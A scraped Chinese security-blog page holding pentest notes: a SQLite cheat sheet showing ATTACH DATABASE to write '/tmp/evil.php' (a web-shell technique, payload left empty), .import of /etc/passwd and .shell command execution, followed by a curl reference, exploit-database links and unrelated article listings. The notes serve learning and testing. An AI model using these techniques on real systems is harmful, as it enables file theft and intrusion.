.shell CMD ARGS...     Run CMD ARGS... in a system shell
.show                  Show the current values for various settings
.stats on|off          Turn stats on or off
.system CMD ARGS...    Run CMD ARGS... in a system shell
.tables ?TABLE?        List names of tables
                         If TABLE specified, only list tables matching
                         LIKE pattern TABLE.
.timeout MS            Try opening locked tables for MS milliseconds
.timer on|off          Turn SQL timer on or off
.trace FILE|off        Output each SQL statement as it is run
.vfsname ?AUX?         Print the name of the VFS stack
.width NUM1 NUM2 ...   Set column widths for "column" mode
                         Negative values right-justify
生成
常见的sqlite功能（注释，concate，substr，十六进制，引用，....）
sqlite> select 1; -- comments
1
sqlite> select 'hello ' || 'world';
hello world
sqlite> select substr('hello world', 1, 3);
hel
sqlite> select hex('a');
61
sqlite> select quote(hex('a'));
'61'
sqlite> PRAGMA database_list;
0|main|/tmp/evil.php
2|pwn|/tmp/evil.php
sqlite> PRAGMA temp_store_directory = '/tmp';
sqlite>
读文件
sqlite>
sqlite> CREATE TABLE pwn.data (data TEXT);
sqlite> .tables
data      pwn.data
sqlite> .import /etc/passwd data
sqlite> select * from data;
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
......
......
sqlite> .tables
data       pwn.data   pwn.shell  shell    
sqlite> DROP TABLE pwn.shell;
写文件
sqlite> ATTACH DATABASE '/tmp/evil.php' as pwn;
sqlite> CREATE TABLE pwn.shell (code TEXT);
sqlite> INSERT INTO pwn.shell (code) VALUES ('');
sqlite> .quit
┌─[✗]─[lab@core]─[~/share/pentestlab/Darknet]
└──╼  file /tmp/evil.php
/tmp/evil.php: SQLite 3.x database
┌─[lab@core]─[~/share/pentestlab/Darknet]
└──╼  strings /tmp/evil.php
SQLite format 3
Itableshellshell
CREATE TABLE shell (code TEXT)
1
命令执行
sqlite> .shell id
uid=1000(lab) gid=1000(lab) groups=1000(lab)
sqlite> .system id
uid=1000(lab) gid=1000(lab) groups=1000(lab)
参考链接
http://www.tutorialspoint.com/sqlite/
http://atta.cked.me/home/sqlite3injectioncheatsheet
curl_hacking
常见操作
curl http://curl.haxx.se
curl http://site.{one,two,three}.com  
curl ftp://ftp.numericals.com/file[1-100].txt  
curl ftp://ftp.numericals.com/file[001-100].txt  
curl ftp://ftp.letters.com/file[a-z].txt  

curl http://any.org/archive[1996-1999]/vol[1-4]/part{a,b,c}.html  

curl http://www.numericals.com/file[1-100:10].txt  
curl http://www.letters.com/file[a-z:2].txt  

curl -o index.html http://curl.haxx.se/  
curl http://curl.haxx.se/ > index.html  

curl -# http://curl.haxx.se/ > index.html  

curl -0 http://curl.haxx.se/  
curl --http1.1 http://curl.haxx.se/  
curl --http2 http://curl.haxx.se/  

curl -1 http://curl.haxx.se/  
curl --tlsv1 http://curl.haxx.se/

curl -2 http://curl.haxx.se/  
curl --sslv2 http://curl.haxx.se/

curl -3 http://curl.haxx.se/  
curl --sslv3 http://curl.haxx.se/

curl -4 http://curl.haxx.se/  
curl --ipv4 http://curl.haxx.se/

curl -6 http://curl.haxx.se/  
curl --ipv6 http://curl.haxx.se/

curl -A "wget/1.0" http://curl.haxx.se/  
curl --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" [URL]
curl --user-agent "Mozilla/4.73 [en] (X11; U; Linux 2.2.15 i686)" [URL]

curl -b "phpsession=Testtest" http://demo.com/    
curl --cookie "name=Daniel" http://curl.haxx.se

curl -c cookies.txt http://curl.haxx.se/  
curl --cookie-jar cookies.txt http://curl.haxx.se

curl -d "username=admin&password=pass" http://curl.haxx.se/  
curl --data "birthyear=1905&press=%20OK%20"  http://curl.haxx.se/when.cgi
curl --data-urlencode "name=I am Daniel" http://curl.haxx.se
curl --data "" --header "Content-Type: text/xml" --request PROPFIND url.com

curl -e "http://referer" http://demo.com/  
curl --referer http://curl.haxx.see http://curl.haxx.se

curl --header "Host:" http://curl.haxx.se
curl --header "Destination: http://nowhere" http://curl.haxx.se

curl -D - http://curl.haxx.se/  
curl --dump-header headers_and_cookies http://curl.haxx.se

curl -L http://github.com/  
curl --location http://curl.haxx.se

curl --dns-servers 8.8.8.8 http://demo.com/  

curl --trace-ascii debugdump.txt http://curl.haxx.se/
curl --form upload=@localfilename --form press=OK [URL]
curl --upload-file uploadfile http://curl.haxx.se/receive.cgi
curl --user name:password http://curl.haxx.se
curl --proxy-user proxyuser:proxypassword curl.haxx.se

curl --cert mycert.pem https://secure.example.com
参考链接
$ man curl
http://curl.haxx.se/docs/manual.html
http://curl.haxx.se/docs/httpscripting.html
http://httpkit.com/resources/HTTP-from-the-Command-Line/
参考链接
 
   
http://www.exploit-db.com/
 
   
http://www.cvedetails.com/
 
   
http://packetstormsecurity.com/
 
   
http://www.securityfocus.com/bid
 
   
http://nvd.nist.gov/
 
   
http://osvdb.org/
 
   
http://cve.mitre.org/
 
   
http://sec.jetlib.com/
 
   
http://0day.today/
 
   
https://www.seebug.org/
 
   
https://www.rapid7.com/db/
 
   
http://zerodayinitiative.com/advisories/published/
 
   
http://exploitsearch.net/
 
   
http://nvd.nist.gov/download/nvd-rss-analyzed.xml
 
   
http://www.intelligentexploit.com/
 
   
https://wpvulndb.com/
 
   
http://www.wordpressexploit.com/
 
   
http://www.drupalexploit.com/
 
   
http://www.openwall.com/lists/oss-security/
 
   
http://exploitsearch.net/
 
   
https://www.vulnerability-lab.com/
 
  

                    

                        
                        

                            
 
                        
                        
                        

                            

                        
                        
                        

                            

                        
                    
                

        
你可能感兴趣的:(【信息安全】,信安)
        

            

                

                    
详细的等保测评攻略就在这里
                        快快小毛毛
网络网络安全系统安全
                        
信息安全等级保护，是对信息和信息载体按照重要性等级分级别进行保护的一种工作。目前我国实行的是等保2.0于2019年12月1日开始实施，等保2.0从传统的信息系统，转变成具有基础信息网络平台的多种新兴技术对象，即具有网络服务，有数据的网络服务平台都可以成为新兴的测评对象。等保2.0备案从原来的自主定级改变成系统定级，才能得到公安机关的备案，关于等保测评详细攻略如下：等保2.0定级步骤:确定定级对象—
                    
                    
等保测评中的关键技术挑战与应对策略
                        亿林数据
网络安全等保测评
                        
在信息安全领域，等保测评（信息安全等级保护测评）作为确保信息系统安全性的重要手段，其过程中不可避免地会遇到一系列技术挑战。这些挑战不仅考验着企业的技术实力，也对其安全管理水平提出了更高要求。本文将深入探讨等保测评中的关键技术挑战，并提出相应的应对策略。一、等保测评中的关键技术挑战1.复杂系统架构的评估难度随着信息技术的快速发展，企业信息系统的架构日益复杂，包括分布式系统、微服务架构、云计算环境等。
                    
                    
CDGA学习笔记三-《数据安全》
                        zy_chris
网络安全
                        
七、数据安全7.1引言数据安全包括安全策略和过程的规划、建立与执行，为数据和信息资产提供正确的身份验证、授权、访问和审计。要求来自以下方面：（1）利益相关方（2）政府法规（3）特定业务关注点（4）合法访问需求（5）合同义务7.1.1业务驱动因素1、降低风险信息安全首先对组织数据进行分级分类，对组织数据进行分类分级的整个流程：1）识别敏感数据资产并分类分级2）在企业中查找敏感数据3）确定保护每项资产
                    
                    
学习笔记：FW内容安全概述
                        TKE_yinian

                        
内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护，防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性（CIA三元组）保护是信息安全的核心目标。CIA（Confidential
                    
                    
信创环境下源代码防泄露解决方案
                        Felixwb
网络服务器
                        
在当今数字化时代，信息安全已成为企业生存与发展的基石，尤其是在信息技术应用创新（信创）环境下，数据保护更是被提升至前所未有的高度。SDC沙盒防泄露系统以其独特的技术架构和卓越的安全性能，在信创环境中构筑起一道坚不可摧的数据防护墙，有效保障了企业数据的安全与隐私。SDC沙盒防泄露系统是一款专为解决数据泄露问题而设计的高端安全产品。该系统通过构建一个隔离的、可控的执行环境（即“沙盒”），对敏感数据的访
                    
                    
国家等保 2.0 时代，你的移动安全要如何防护？
                        Reneeeeee412

                        
移动互联时代，什么对企业最重要？是人才？是技术？在勒索病毒“WannaCry”肆虐全球之后企业更加意识到安全才是关键所在跃至2.0时代国家等级保护范围扩展到新领域在信息安全领域，国家提出了最为深远的保障制度——信息安全等级保护制度。在2017年5月等保制度顺应时代要求一跃升级到2.0，不仅安全等级的评定条件更加严格，保护要求也扩展到移动互联、云计算、大数据、物联网和工业控制等新技术和新应用领域。在
                    
                    
L4-7硬件负载均衡记录上一跳（last hop）原理分析
                        木尘zero
负载均衡运维tcp/ip网络
                        
目前随着L4-7层国产硬件负载均衡设备涌入市场，硬件负载均衡产品的各项功能的介绍也是很多，本文对目前主流的硬件负载均衡产品在负载过程记录上一跳的功能原理进行大致的分析。硬件负载均衡产品大家估计想到的有很多；有主机类型的也有交换类型的硬件负载均衡产品，例如：F5（云科）、深信服(SANGFORAD)、迪普（DPtech）、弘积（horizon-adn）信安世纪(NSAE)等等是基于交换类型的的负载均
                    
                    
推动国密SSL发展的建议与策略
                        bilicute
ssl网络协议网络
                        
摘要：国密SSL作为我国网络安全的重要组成部分，其发展对于保障国家信息安全具有重要意义。本文针对国密SSL当前发展现状，提出了几点发展建议，旨在推动国密SSL技术的广泛应用和市场竞争力。一、引言国密SSL（SecureSocketsLayer）是指采用国家商用密码算法的SSL证书，它在我国网络安全体系中扮演着至关重要的角色。随着网络信息化的快速发展，国密SSL的应用前景日益广阔。然而，面对国际SS
                    
                    
浅析‖医疗行业数据安全
                        等保星视界

                        
最近小编接触到了医疗行业，猛然发觉信息化技术当前真的是深入应用到了医院的日常经营发展中，医院整体的管理运营全都面向系统化，让医院的管理效率、质量都纷纷得以提升。这也使得信息安全管理工作占据了更加重要的位置。小编总结了下医院信息安全管理的主要工作大概包括这几点：l信息系统网络安全l备份信息记录安全l计算机设备病毒防治l医院信息管理系统平台安全等想必大家也都有所了解，医疗记录包含大量敏感信息：如病患的
                    
                    
信息安全国内外现状及技术要求示例（R155/R156）
                        mini积木
信息安全安全mcu
                        
国际政策、法规的现状与趋势鉴于对交通安全、社会安全甚至国家安全的重要影响，汽车网络安全、数据安全得到各相关国家和地区的高度重视，纷纷出台相关法规、标准。信息安全法规R155法规适用范围覆盖了乘用车及商用车，适用于M类、N类车型，装备了至少一个ECU的O类车型，以及具备L3及以上自动驾驶功能的L6和L7类车型。此法规适合于1958协议国（包括欧洲、日本、俄罗斯、澳大利亚等）。根据欧盟要求，从2022
                    
                    
NISP 一级 —— 考证笔记合集
                        SRC_BLUE_17
网络安全资源导航#网络安全相关笔记笔记网络安全证书获取NISP
                        
该笔记为导航目录，在接下来一段事件内，我会每天发布我关于考取该证书的相关笔记。当更新完成后，此条注释会被删除。第一章信息安全概述1.1信息与信息安全1.2信息安全威胁1.3信息安全发展阶段与形式1.4信息安全保障1.5信息系统安全保障第二章信息安全基础技术2.1密码学2.2数字证书与公钥基础设施2.3身份认证2.4访问控制2.5安全审计第三章网络安全防护技术3.1网络基础知识3.2网络安全威胁3.
                    
                    
信息安全、网络安全、网络空间安全傻傻分不清？
                        亿林科技网络安全
web安全安全
                        
信息安全、网络安全、网络空间安全：三个概念的解析与区分随着信息技术的迅猛发展，信息安全、网络安全、网络空间安全这三个概念逐渐进入人们的视野。虽然它们密切相关，但在含义上却有所区别。本文将深入探讨这三个概念的定义、内涵及其区别。一、信息安全信息安全是指保护信息免受未经授权的访问、使用、破坏或泄露的科学与技术手段的总和。其核心目标是确保信息的机密性、完整性和可用性。信息安全涉及的范围包括计算机系统、网
                    
                    
干货 ‖ 三分钟让你区分“等级保护、风险评估和安全测评”
                        等保星视界

                        
接触安全行业的大家大概会经常遇到这几个关键词，“等级保护”、“风险评估”、“系统安全评测”，这都是当前国家信息安全保障建设体系中的热门话题。但是肯定有很多小伙伴还是对他们之间的区别和联系不是那么明确，今天小编就来帮大家缕一缕。一、三者的概念介绍A、等级保护概念介绍：等级保护全名信息安全等级保护，是指对国家各类信息系统分等级进行安全保护，对信息系统中的安全产品进行等级管理，对信息系统中的信息安全事件
                    
                    
2024网安周今日开幕，亚信安全亮相30城
                        亚信安全官方账号
信息安全亚信安全数据安全网络安全
                        
2024年国家网络安全宣传周今天在广州拉开帷幕。今年网安周继续以“网络安全为人民，网络安全靠人民”为主题。2024年国家网络安全宣传周涵盖了1场开幕式、1场高峰论坛、5个重要活动、15场分论坛/座谈会/闭门会、6个主题日活动和网络安全“六进”活动。亚信安全出席2024年国家网络安全宣传周开幕式和主论坛,并将通过线下宣讲、创意科普、成果展示等多种形式，让广大民众看得懂、记得住安全知识，同时还配合各地
                    
                    
五分钟了解等级保护、风险评估和安全测评三者的区别和联系？
                        亿林等保
安全网络安全
                        
等级保护基本概念：网络安全等级保护是指对国家秘密信息、法人和其他组织和公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统分等级实行安全保护，对信息系统中使用的安全产品实行按等级管理，对信息系统中发生的信息安全事件等等级响应、处置。这里所指的信息系统，是指由计算机及其相关和配套的设备、设施构成的，按照一定的应用目标和规则对信息进行存储、传输、处理的系统或者网络；信息是指在信息系统中存储、
                    
                    
一分钟了解小程序的等保测评
                        亿林科技网络安全
小程序
                        
小程序作为移动互联网应用的一种形式，其安全性和合规性受到了国家法律法规的严格要求。根据《中华人民共和国网络安全法》和《信息安全技术个人信息安全规范》等相关法律法规，小程序在开发和运营过程中需要进行等级保护测评（等保测评），以确保用户数据的安全和隐私保护。等保测评是指对信息系统进行安全等级保护的评估，包括安全技术措施和安全管理措施的评估。小程序的等保测评得分需要在70分以上，且信息系统没有高风险项才
                    
                    
阿里大牛漫谈“去IOE”架构: 过程苦 结局好
                        weixin_34194087
数据库
                        
2019独角兽企业重金招聘Python工程师标准>>>阿里大牛漫谈“去IOE”架构:过程苦结局好随着国外斯诺登的棱镜门事件持续发酵，国内近期一场大规模网络瘫痪引起轩然大波，安全问题将直指人心，一时间IOE（IBM、Oracle和EMC）被推到信息安全的风口浪尖，近日联想收购IBM的X86服务器更是削弱了IOE的力量。而由阿里人掀起的去“IOE”运动风险极高，但受益很高。没有了“IOE”这些高富帅的
                    
                    
2023 下半年信息安全工程师考试真题答案
                        rockmelodies
安全网络安全
                        
一、单项选择如下有关信息安全管理员职责旳论述，不对旳旳是（）A.信息安全管理员应当对网络旳总体安全布局进行规划B.信息安全管理员应当对信息系统安全事件进行处理C.信息安全管理员应当负责为顾客编写安全应用程序D.信息安全管理员应当对安全设备进行优化配置国家密码管理局于2023年公布了“无线局域网产品须使用旳系列密码算法”，其中规定密钥协商算法应使用旳是（）A.DHB.ECDSAC.ECDHD.CPK
                    
                    
四级信息安全工程师考试大纲
                        憨憨tiantian
笔记经验分享计算机网络操作系统
                        
文章目录前言：考核项目一、考试方式二、操作系统原理1.基本要求2.考试内容三、计算机网络1.基本要求2.考试内容总结前言：考核项目四级信息安全工程师考核操作系统原理和计算机网络两门课程。测试内容包括网络攻击与保护的基本理论技术，以及操作系统、路由设备的安全防范技能。一、考试方式本考试为上机考试，时长为90分钟，满分100分。考试题型及分值（1）操作系统原理——单选题（30分）（2）操作系统原理——
                    
                    
探索未知的利器：Detect It Easy（DIE）——文件类型检测大师
                        颜旖玫Michael

                        
探索未知的利器：DetectItEasy（DIE）——文件类型检测大师Detect-It-EasyProgramfordeterminingtypesoffilesforWindows,LinuxandMacOS.项目地址:https://gitcode.com/gh_mirrors/de/Detect-It-Easy在信息安全领域，了解文件的真实性质是至关重要的。DetectItEasy（简称D
                    
                    
国产化操作系统(x86_64|aarch64)生态构建之RTSP播放器选型
                        音视频牛哥
大牛直播SDK音视频国产化操作系统rtsp播放器linuxrtsp播放器linuxarmrtsplinux平台rtsp播放aarch64rtsp大牛直播SDK
                        
为什么要推进国产化操作系统我们经常听到的一句话是：国货当自强！国产操作系统也是，推进国产化操作系统的原因是多方面的，推进国产化操作系统是保障国家信息安全、促进技术自主创新、提升产业竞争力以及满足特定需求的重要举措。未来，随着技术的不断进步和市场的不断扩展，国产化操作系统将迎来更加广阔的发展前景。一、保障国家信息安全减少对外部系统的依赖：国产化操作系统可以更好地符合国家安全标准，减少对国外操作系统的
                    
                    
《信》
                        山抹微云天粘衰草

                        
亲爱的安生：展信安！冰雪渐融，百花斗妍，浅草没蹄，春风拂槛，时光静流，蓦然回首，才惊觉好久没向你写信了。提笔之际，脑海中猛然跳出今天发生的一件事：今天，我去取包裹，有一个女孩排在我前面，背着一个浅蓝色的大大的背包，穿着一件白色素衫，马尾高高扎起，显得清爽无比。拿起包裹，女孩迟疑了一下，似乎想问点什么，却终究什么也没有说，静静地走了。轮到我领包裹签名确认信息是，却发现那个女孩又折返回来了，看了我一眼
                    
                    
openEuler 社区 2024 年 6 月运作报告
                        openEuler社区
开源操作系统openEuler
                        
概述6月6日，OpenAtomopenEuler（简称“openEuler”）版本发布会在北京举办，开放原子开源基金会和中国科学院软件研究所、麒麟软件、麒麟信安、统信软件、中移云能、天翼云、联通数科、华为、英特尔（中国）、超聚变、软通动力、润和软件、龙芯中科、粤港澳大湾区国创中心、AMD、新华三、飞腾信息、浙江大华、联想、华鲲振宇、中关村实验室与中科院计算所、京东科技、中软国际、凝思软件、中科方德
                    
                    
本博客公告
                        维基人
公告安全系统安全web安全安全架构
                        
博客公告/soulblog一、博客涉及领域信息安全，计算机网络及操作系统等二、博客更新每周一和周六定时更新三、说明该博客上的所有文章都将在博客园、CSDN和Medium上持续，同步更新博客环境安全，无任何诱导链接，博客坚持无广告化，不会投放任何广告所有文章均为原创，转载请注明出处！四、同步链接本人已购多域名,通过GitHub绑定进行重定向到各平台上，通过本人的域名可以访问到各博客平台上链接如下(点
                    
                    
网络安全工程师培训费用
                        汇智知了堂
web安全网络安全
                        
在当今这个信息化迅猛发展的时代，网络安全已成为各行各业关注的焦点。作为保障网络信息安全的中坚力量，网络安全工程师的需求量逐年攀升。随之而来的是，越来越多的人对网络安全工程师的培训费用充满了好奇。本文将为您详细解析这一问题，帮助您在选择培训时做出明智的决策。网络安全工程师培训费用因培训机构、课程内容和地点等因素而有所不同。一般来说，培训费用在几千到几万元之间。具体费用取决于所选的培训机构和课程。以下
                    
                    
死守安全底线，荣耀8X全球首发“AI基站防伪技术”
                        科技银狐

                        
随着电信诈骗手段的不断升级，不少用户都被诈骗份子套入陷阱，相信这是很多消费者一直存在的痛点。但大部分手机厂商仍然在拼性能、拼功能的维度上，并没有重视用户的信息安全，这是让人比较失望的。目前市面上主流的免打扰和拦截垃圾信息的手段比较滞后，其做法无非是进行关键字匹配，将骚扰电话进行标记，如发现有标记的号码打来就直接阻断，但这种方式存在很多绕过的可能性，仍然无法根治此类问题。光靠手机进行单维度的防护总归
                    
                    
2024年入职/转行网络安全，该如何规划？_网络安全职业规划
                        徐老师教网络安全
web安全安全phphttps网络协议
                        
前言前段时间，知名机构麦可思研究院发布了《2022年中国本科生就业报告》，其中详细列出近五年的本科绿牌专业，其中，信息安全位列第一。网络安全前景对于网络安全的发展与就业前景，想必无需我多言，作为当下应届生收入较高的专业之一，网络安全同样也在转行领域中占据热门位置，主要具备以下几点转行优势：行业人才缺口大，至2027年我国网安人才缺口将达327万知识体系友好，计算机及英语水平相对薄弱的同学也可学习上
                    
                    
2024年入职/转行网络安全，该如何规划？_网络安全职业规划
                        徐老师教网络安全
web安全安全phphttps网络协议
                        
前言前段时间，知名机构麦可思研究院发布了《2022年中国本科生就业报告》，其中详细列出近五年的本科绿牌专业，其中，信息安全位列第一。网络安全前景对于网络安全的发展与就业前景，想必无需我多言，作为当下应届生收入较高的专业之一，网络安全同样也在转行领域中占据热门位置，主要具备以下几点转行优势：行业人才缺口大，至2027年我国网安人才缺口将达327万知识体系友好，计算机及英语水平相对薄弱的同学也可学习上
                    
                    
私人工具集4——C#加密解密类（CryptoHelper）
                        gzhosp_redAnt
小徐的私人工具集加密解密.netrsamd5c#
                        
子曰：“工欲善其事，必先利其器”github地址：https://github.com/redAntCpp/CSharpTools加密解密在日常开发中也是经常用到，尤其是在写登录功能时，对用户的密码进行加密，有时，对信息安全要求较高时，也需要对传输的数据进行加密，然后本地解密后得到相应的报文，然后继续进行业务。比如银行的金额，医院的患者病历信息等。简单的加密方式介绍加密分为：对称加密和非对称加密。
                    
                    
多重安全措施：构建信息防护网
                        SheldonChang
加解密安全网络
                        
多重安全措施：构建信息防护网在当今数字化的世界里，信息安全已经成为企业和个人不可或缺的一部分。随着技术的发展，网络攻击手段也变得越来越复杂和多样化。因此，单靠一种安全措施已经无法全面保护我们的信息资产。本文将探讨如何通过结合多种安全措施来构建更加坚固的安全防御体系，并给出一些实际的应用案例。1.引言在过去的几年里，信息安全事件频繁发生，从个人信息泄露到企业数据被窃取，每一次事件都提醒着我们加强信息
                    
                                
VMware Workstation 11 或者 VMware Player 7安装MAC OS X 10.10 Yosemite
                                    iwindyforest
vmwaremac os10.10workstationplayer
                                    
最近尝试了下VMware下安装MacOS 系统， 
安装过程中发现网上可供参考的文章都是VMware Workstation 10以下， MacOS X 10.9以下的文章， 
只能提供大概的思路， 但是实际安装起来由于版本问题， 走了不少弯路， 所以我尝试写以下总结， 希望能给有兴趣安装OSX的人提供一点帮助。 
  
  
写在前面的话： 
其实安装好后发现， 由于我的th
                                
                                
关于《基于模型驱动的B/S在线开发平台》源代码开源的疑虑？
                                    deathwknight
JavaScriptjava框架
                                    
本人从学习Java开发到现在已有10年整，从一个要自学 java买成javascript的小菜鸟，成长为只会java和javascript语言的老菜鸟（个人邮箱：[email protected]） 
 
一路走来，跌跌撞撞。用自己的三年多业余时间，瞎搞一个小东西（基于模型驱动的B/S在线开发平台，非MVC框架、非代码生成）。希望与大家一起分享，同时有许些疑虑，希望有人可以交流下 
 
平台
                                
                                
如何把maven项目转成web项目
                                    Kai_Ge
mavenMyEclipse
                                    
创建Web工程，使用eclipse ee创建maven web工程 1.右键项目,选择Project Facets,点击Convert to faceted from 2.更改Dynamic Web Module的Version为2.5.(3.0为Java7的,Tomcat6不支持). 如果提示错误,可能需要在Java Compiler设置Compiler compl
                                
                                
主管？？？
                                    Array_06
工作
                                    
转载：http://www.blogjava.net/fastzch/archive/2010/11/25/339054.html 
 
 
 
 
很久以前跟同事参加的培训，同事整理得很详细，必须得转！ 
 
前段时间，公司有组织中高阶主管及其培养干部进行了为期三天的管理训练培训。三天的课程下来，虽然内容较多，因对老师三天来的课程内容深有感触，故借着整理学习心得的机会，将三天来的培训课程做了一个
                                
                                
python内置函数大全
                                    2002wmj
python
                                    
最近一直在看python的document，打算在基础方面重点看一下python的keyword、Build-in Function、Build-in Constants、Build-in Types、Build-in Exception这四个方面，其实在看的时候发现整个《The Python Standard Library》章节都是很不错的，其中描述了很多不错的主题。先把Build-in Fu
                                
                                
JSP页面通过JQUERY合并行
                                    357029540
JavaScriptjquery
                                    
在写程序的过程中我们难免会遇到在页面上合并单元行的情况，如图所示 
 
 
如果对于会的同学可能很简单，但是对没有思路的同学来说还是比较麻烦的，提供一下用JQUERY实现的参考代码 
 
function mergeCell(){ 
        var trs = $("#table tr"); 
&nb
                                
                                
Java基础
                                    冰天百华
java基础
                                    
学习函数式编程 
package base;

import java.text.DecimalFormat;

public class Main {

	public static void main(String[] args) {
//		Integer a = 4;  
//		Double aa = (double)a  / 100000;  
//		Decimal
                                
                                
unix时间戳相互转换
                                    adminjun
转换unix时间戳
                                    
如何在不同编程语言中获取现在的Unix时间戳(Unix timestamp)？     Java time   JavaScript Math.round(new Date().getTime()/1000)
getTime()返回数值的单位是毫秒   Microsoft .NET / C# epoch = (DateTime.Now.ToUniversalTime().Ticks - 62135
                                
                                
作为一个合格程序员该做的事
                                    aijuans
程序员
                                    
作为一个合格程序员每天该做的事   1、总结自己一天任务的完成情况 最好的方式是写工作日志，把自己今天完成了什么事情，遇见了什么问题都记录下来，日后翻看好处多多 
2、考虑自己明天应该做的主要工作 把明天要做的事情列出来，并按照优先级排列，第二天应该把自己效率最高的时间分配给最重要的工作 
3、考虑自己一天工作中失误的地方，并想出避免下一次再犯的方法 出错不要紧，最重
                                
                                
由html5视频播放引发的总结
                                    ayaoxinchao
html5视频video
                                    
前言 
  
项目中存在视频播放的功能，前期设计是以flash播放器播放视频的。但是现在由于需要兼容苹果的设备，必须采用html5的方式来播放视频。我就出于兴趣对html5播放视频做了简单的了解，不了解不知道，水真是很深。本文所记录的知识一些浅尝辄止的知识，说起来很惭愧。 
  
视频结构 
  
本该直接介绍html5的<video>的，但鉴于本人对视频
                                
                                
解决httpclient访问自签名https报javax.net.ssl.SSLHandshakeException: sun.security.validat
                                    bewithme
httpclient
                                    
     如果你构建了一个https协议的站点，而此站点的安全证书并不是合法的第三方证书颁发机构所签发，那么你用httpclient去访问此站点会报如下错误 
  
javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path bu
                                
                                
Jedis连接池的入门级使用
                                    bijian1013
redisredis数据库jedis
                                    
Jedis连接池操作步骤如下： 
        a.获取Jedis实例需要从JedisPool中获取； 
        b.用完Jedis实例需要返还给JedisPool； 
        c.如果Jedis在使用过程中出错，则也需要还给JedisPool； 
packag
                                
                                
变与不变
                                    bingyingao
不变变亲情永恒
                                    
变与不变 
   周末骑车转到了五年前租住的小区，曾经最爱吃的西北面馆、江西水饺、手工拉面早已不在， 
   各种店铺都换了好几茬，这些是变的。 
   三年前还很流行的一款手机在今天看起来已经落后的不像样子。 
   三年前还运行的好好的一家公司，今天也已经不复存在。 
   一座座高楼拔地而起，
                                
                                
【Scala十】Scala核心四：集合框架之List
                                    bit1129
scala
                                    
Spark的RDD作为一个分布式不可变的数据集合，它提供的转换操作，很多是借鉴于Scala的集合框架提供的一些函数，因此，有必要对Scala的集合进行详细的了解 
  
1. 泛型集合都是协变的，对于List而言，如果B是A的子类，那么List[B]也是List[A]的子类，即可以把List[B]的实例赋值给List[A]变量 
  
2. 给变量赋值(注意val关键字，a，b
                                
                                
Nested Functions in C
                                    bookjovi
cclosure
                                    
  
Nested Functions 又称closure，属于functional language中的概念，一直以为C中是不支持closure的，现在看来我错了，不过C标准中是不支持的，而GCC支持。 
  
既然GCC支持了closure，那么 lexical scoping自然也支持了，同时在C中label也是可以在nested functions中自由跳转的
                                
                                
Java-Collections Framework学习与总结-WeakHashMap
                                    BrokenDreams
Collections
                                    
        总结这个类之前，首先看一下Java引用的相关知识。Java的引用分为四种：强引用、软引用、弱引用和虚引用。 
 
        
强引用：就是常见的代码中的引用，如Object o = new Object();存在强引用的对象不会被垃圾收集
                                
                                
读《研磨设计模式》-代码笔记-解释器模式-Interpret
                                    bylijinnan
java设计模式
                                    
声明： 本文只为方便我个人查阅和理解，详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ 
 
 

package design.pattern;

/*
 * 解释器（Interpreter）模式的意图是可以按照自己定义的组合规则集合来组合可执行对象
 * 
 * 代码示例实现XML里面1.读取单个元素的值 2.读取单个属性的值
 * 多
                                
                                
After Effects操作&快捷键
                                    cherishLC
After Effects
                                    
1、快捷键官方文档 
 
 
 中文版：https://helpx.adobe.com/cn/after-effects/using/keyboard-shortcuts-reference.html  
 英文版：https://helpx.adobe.com/after-effects/using/keyboard-shortcuts-reference.html  
 
 
 2、常用快捷键
                                
                                
Maven 常用命令
                                    crabdave
maven
                                    
Maven 常用命令 
  
mvn archetype:generate 
mvn install 
mvn clean 
mvn clean complie 
mvn clean test 
mvn clean install 
mvn clean package 
mvn test 
mvn package 
mvn site 
  
mvn dependency:res
                                
                                
shell bad substitution
                                    daizj
shell脚本
                                    
#!/bin/sh 
 
/data/script/common/run_cmd.exp 192.168.13.168 "impala-shell -islave4 -q 'insert OVERWRITE table imeis.${tableName} select ${selectFields}, ds, fnv_hash(concat(cast(ds as string), im
                                
                                
Java SE 第二讲（原生数据类型 Primitive Data Type）
                                    dcj3sjt126com
java
                                    
Java SE  第二讲： 
 
1.   Windows: notepad, editplus, ultraedit, gvim 
Linux: vi, vim, gedit 
 
2.   Java 中的数据类型分为两大类： 
1）原生数据类型  （Primitive Data Type） 
2）引用类型（对象类型）  （R
                                
                                
CGridView中实现批量删除
                                    dcj3sjt126com
PHPyii
                                    
1，CGridView中的columns添加 
array(
                        'selectableRows' => 2,
                        'footer' => '<button type="button" onclick="GetCheckbox();" style=&
                                
                                
Java中泛型的各种使用
                                    dyy_gusi
java泛型
                                    
Java中的泛型的使用：1.普通的泛型使用 
在使用类的时候后面的<>中的类型就是我们确定的类型。 
public class MyClass1<T> {//此处定义的泛型是T
    private T var;

    public T getVar() {
        return var;
    }

    public void setVa
                                
                                
Web开发技术十年发展历程
                                    gcq511120594
Web浏览器数据挖掘
                                    
回顾web开发技术这十年发展历程： 
Ajax 
03年的时候我上六年级，那时候网吧刚在小县城的角落萌生。传奇，大话西游第一代网游一时风靡。我抱着试一试的心态给了网吧老板两块钱想申请个号玩玩，然后接下来的一个小时我一直在，注，册，账，号。 
彼时网吧用的512k的带宽，注册的时候，填了一堆信息，提交，页面跳转，嘣，”您填写的信息有误，请重填”。然后跳转回注册页面，以此循环。我现在时常想，如果当时a
                                
                                
openSession()与getCurrentSession()区别：
                                    hetongfei
javaDAOHibernate
                                    
来自 http://blog.csdn.net/dy511/article/details/6166134 
1.getCurrentSession创建的session会和绑定到当前线程,而openSession不会。 
2. getCurrentSession创建的线程会在事务回滚或事物提交后自动关闭,而openSession必须手动关闭。 
这里getCurrentSession本地事务(本地
                                
                                
第一章 安装Nginx+Lua开发环境
                                    jinnianshilongnian
nginxluaopenresty
                                    
